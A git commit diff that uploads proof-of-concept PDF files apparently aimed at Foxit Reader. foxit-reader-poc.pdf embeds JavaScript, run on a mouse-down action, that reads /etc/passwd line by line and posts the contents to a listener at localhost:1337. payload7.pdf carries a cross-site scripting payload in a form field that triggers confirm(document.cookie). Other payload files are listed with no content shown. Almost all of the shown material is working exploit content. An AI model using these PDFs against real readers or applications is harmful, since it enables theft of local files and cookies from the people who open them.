Add files via upload

2024-08-27 06:53:35 +03:30 · 2024-08-27 06:53:35 +03:30 · 9e7f7b1034
commit 9e7f7b1034
parent 969642b392
10 changed files with 241 additions and 0 deletions
--- a/foxit-reader-poc.pdf
+++ b/foxit-reader-poc.pdf
@ -0,0 +1,104 @@
+%PDF-1.5
+%<25><><EFBFBD><EFBFBD>
+1 0 obj
+<<
+  /Type /Catalog
+  /Pages 2 0 R
+  /AcroForm 4 0 R
+>>
+endobj
+2 0 obj
+<<
+  /Type /Pages
+  /Count 1
+  /Kids [
+    3 0 R
+  ]
+>>
+endobj
+% Page number 0.
+3 0 obj
+<<
+  /Type /Page
+  /Parent 2 0 R
+  /Resources <<
+    /Font <</F1 20 0 R>>
+  >>
+  /Annots [ 5 0 R ]
+  /Contents [21 0 R]
+  /MediaBox [0 0 612 792]
+>>
+endobj
+% Forms
+4 0 obj
+<<
+  /Fields [
+    5 0 R
+    6 0 R
+    7 0 R
+  ]
+>>
+endobj
+% Field with actions:
+% Cursor enter: E
+% Cursor exit: X
+% Mouse down: D
+% Mouse up: U
+% Focus: Fo
+% Blur: Bl
+5 0 obj
+<<
+ /Type /Annot
+ /Subtype /Widget
+ /FT /Tx
+ /T (##)
+ /Rect [100 200 150 250]
+ /AA <<
+   /D 10 0 R
+ >>
+>>
+endobj
+% http://localhost:1337/post-test
+10 0 obj
+<<
+  % Foxit Reader 11.1.2 App Store
+  /Type /Action
+  /S /JavaScript
+  /JS (
+    try {
+      var test = this.importTextData("/etc/passwd", 0);
+      i = 0;
+      while (test == 0) {
+        i++;
+        var k = this.getField('##').value;
+        test = this.importTextData("/etc/passwd", i);
+        k += this.getField('##').value;
+        this.getField('##').value = k;
+      }
+      this.submitForm\("http://localhost:1337/post-test", false, true, []\);
+      this.getField('##').value = '';
+    } catch \(e\) {
+       app.alert\("ERROR: " + e\);
+    }
+  )
+>>
+endobj
+xref
+0000000000 65535 f
+0000000015 00000 n
+0000000274 00000 n
+0000000372 00000 n
+0000000096 00000 n
+0000000469 00000 n
+0000000524 00000 n
+0000000723 00000 n
+0000000755 00000 n
+0000000920 00000 n
+trailer
+<<
+/Size 10
+/Root 1 0 R
+>>
+startxref
+8360
+%%EOF
--- a/payload1.pdf
+++ b/payload1.pdf
--- a/payload2.pdf
+++ b/payload2.pdf
--- a/payload3.pdf
+++ b/payload3.pdf
--- a/payload4.pdf
+++ b/payload4.pdf
--- a/payload5.pdf
+++ b/payload5.pdf
--- a/payload6.pdf
+++ b/payload6.pdf
--- a/payload7.pdf
+++ b/payload7.pdf
@ -0,0 +1,137 @@
+%PDF-1.5
+%µ¶
+
+2 0 obj
+<<
+  /Type /Catalog
+  /Pages 4 0 R
+  /AcroForm 5 0 R
+>>
+endobj
+
+3 0 obj
+<<
+  /Producer (3.0.8 \(5.0.12\) )
+  /ModDate (D:20240124022206+01'00')
+>>
+endobj
+
+4 0 obj
+<<
+  /Type /Pages
+  /Count 1
+  /Kids [ 6 0 R ]
+>>
+endobj
+
+5 0 obj
+<<
+  /Fields [ 7 0 R 8 0 R 9 0 R ]
+>>
+endobj
+
+6 0 obj
+<<
+  /Type /Page
+  /Parent 4 0 R
+  /Resources 10 0 R
+  /Annots [ 7 0 R ]
+  /Contents [ ]
+  /MediaBox [ 0 0 612 792 ]
+>>
+endobj
+
+7 0 obj
+<<
+  /Type /Annot
+  /Subtype /Widget
+  /FT /Tx
+  /T (MyField)
+  /V (">'></div><details/open/ontoggle=confirm(document.cookie)></details>)
+  /Rect [ 100 200 150 250 ]
+  /AA 11 0 R
+>>
+endobj
+
+8 0 obj
+<<
+  /Type /Annot
+  /Subtype /Widget
+  /FT /Tx
+  /T (uname)
+  /Rect [ 400 400 500 429 ]
+  /V (test)
+>>
+endobj
+
+9 0 obj
+<<
+  /Type /Annot
+  /Subtype /Widget
+  /FT /Tx
+  /T (pass)
+  /Rect [ 400 440 500 469 ]
+  /V (test2)
+>>
+endobj
+
+10 0 obj
+<<
+  /Font 12 0 R
+>>
+endobj
+
+11 0 obj
+<<
+  /D 13 0 R
+>>
+endobj
+
+12 0 obj
+<<
+  /F1 14 0 R
+>>
+endobj
+
+13 0 obj
+<<
+  /Type /Action
+  /S /JavaScript
+  /JS ()
+>>
+endobj
+
+15 0 obj
+722
+endobj
+
+xref
+0 17
+0000000001 65536 f 
+0000000014 00001 f 
+0000000016 00000 n 
+0000000088 00000 n 
+0000000179 00000 n 
+0000000245 00000 n 
+0000000299 00000 n 
+0000000435 00000 n 
+0000000695 00000 n 
+0000000814 00000 n 
+0000000933 00000 n 
+0000000971 00000 n 
+0000001006 00000 n 
+0000001042 00000 n 
+0000000016 00012 f 
+0000001512 00000 n 
+0000001533 00001 f 
+
+trailer
+<<
+  /Size 17
+  /Info 3 0 R
+  /Root 2 0 R
+  /ID [ <1BD23AF7891A7C6149620DD94F5BD223> <1BD23AF7891A7C6149620DD94F5BD223> ]
+>>
+startxref
+1533
+%%EOF
--- a/payload8.pdf
+++ b/payload8.pdf
--- a/starter_pack.pdf
+++ b/starter_pack.pdf